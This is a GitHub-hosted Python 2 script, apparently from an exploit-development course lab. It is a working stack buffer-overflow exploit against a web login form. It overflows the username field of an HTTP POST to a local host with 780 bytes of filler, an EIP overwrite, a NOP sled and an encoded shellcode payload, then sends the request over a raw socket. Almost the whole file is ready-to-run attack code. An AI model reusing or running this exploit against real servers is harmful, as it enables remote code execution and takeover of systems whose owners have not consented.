-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathnops.py
73 lines (61 loc) · 2.95 KB
/
nops.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!/usr/bin/python
import socket
try:
print "\nSending evil buffer..."
shellcode = ("\xba\xdb\x01\x43\xe1\xdb\xc7\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x52\x31\x56\x12\x83\xee\xfc\x03\x8d\x0f\xa1\x14\xcd\xf8\xa7"
"\xd7\x2d\xf9\xc7\x5e\xc8\xc8\xc7\x05\x99\x7b\xf8\x4e\xcf\x77"
"\x73\x02\xfb\x0c\xf1\x8b\x0c\xa4\xbc\xed\x23\x35\xec\xce\x22"
"\xb5\xef\x02\x84\x84\x3f\x57\xc5\xc1\x22\x9a\x97\x9a\x29\x09"
"\x07\xae\x64\x92\xac\xfc\x69\x92\x51\xb4\x88\xb3\xc4\xce\xd2"
"\x13\xe7\x03\x6f\x1a\xff\x40\x4a\xd4\x74\xb2\x20\xe7\x5c\x8a"
"\xc9\x44\xa1\x22\x38\x94\xe6\x85\xa3\xe3\x1e\xf6\x5e\xf4\xe5"
"\x84\x84\x71\xfd\x2f\x4e\x21\xd9\xce\x83\xb4\xaa\xdd\x68\xb2"
"\xf4\xc1\x6f\x17\x8f\xfe\xe4\x96\x5f\x77\xbe\xbc\x7b\xd3\x64"
"\xdc\xda\xb9\xcb\xe1\x3c\x62\xb3\x47\x37\x8f\xa0\xf5\x1a\xd8"
"\x05\x34\xa4\x18\x02\x4f\xd7\x2a\x8d\xfb\x7f\x07\x46\x22\x78"
"\x68\x7d\x92\x16\x97\x7e\xe3\x3f\x5c\x2a\xb3\x57\x75\x53\x58"
"\xa7\x7a\x86\xcf\xf7\xd4\x79\xb0\xa7\x94\x29\x58\xad\x1a\x15"
"\x78\xce\xf0\x3e\x13\x35\x93\x80\x4c\x35\x7f\x69\x8f\x35\x7e"
"\xd2\x06\xd3\xea\x34\x4f\x4c\x83\xad\xca\x06\x32\x31\xc1\x63"
"\x74\xb9\xe6\x94\x3b\x4a\x82\x86\xac\xba\xd9\xf4\x7b\xc4\xf7"
"\x90\xe0\x57\x9c\x60\x6e\x44\x0b\x37\x27\xba\x42\xdd\xd5\xe5"
"\xfc\xc3\x27\x73\xc6\x47\xfc\x40\xc9\x46\x71\xfc\xed\x58\x4f"
"\xfd\xa9\x0c\x1f\xa8\x67\xfa\xd9\x02\xc6\x54\xb0\xf9\x80\x30"
"\x45\x32\x13\x46\x4a\x1f\xe5\xa6\xfb\xf6\xb0\xd9\x34\x9f\x34"
"\xa2\x28\x3f\xba\x79\xe9\x4f\xf1\x23\x58\xd8\x5c\xb6\xd8\x85"
"\x5e\x6d\x1e\xb0\xdc\x87\xdf\x47\xfc\xe2\xda\x0c\xba\x1f\x97"
"\x1d\x2f\x1f\x04\x1d\x7a")
filler = "A" * 780
eip = "\x83\x0c\x09\x10"
offset = "C" * 4
nops = "\x90" * 10
inputBuffer = filler + eip + offset + nops + shellcode
content = "username="+inputBuffer+"&password=A"
#-- Recreate the HTTP headers as seen from Wireshark --#
buffer = "POST /login HTTP/1.1\r\n"
buffer += "Host: 192.168.0.20\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer += "Accept-Language: en-US,en;q=0.5\r\n"
# Encoding not in training
buffer += "Accept-Encoding: gzip, deflate\r\n"
buffer += "Referer: http://192.168.0.20/login\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: " + str(len(content)) + "\r\n"
# The DNT header not in training
buffer += "DNT: 1\r\n"
# Connection is closed in training
#buffer += "Connection: keep-alive\r\n"
buffer += "Connection: close\r\n"
# Not included in manual
buffer += "Upgrade-Insecure-Requests: 1\r\n"
buffer += "\r\n"
buffer += content
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.20",80))
s.send(buffer)
s.close()
print "\nDone!"
except:
print "Could not connect!"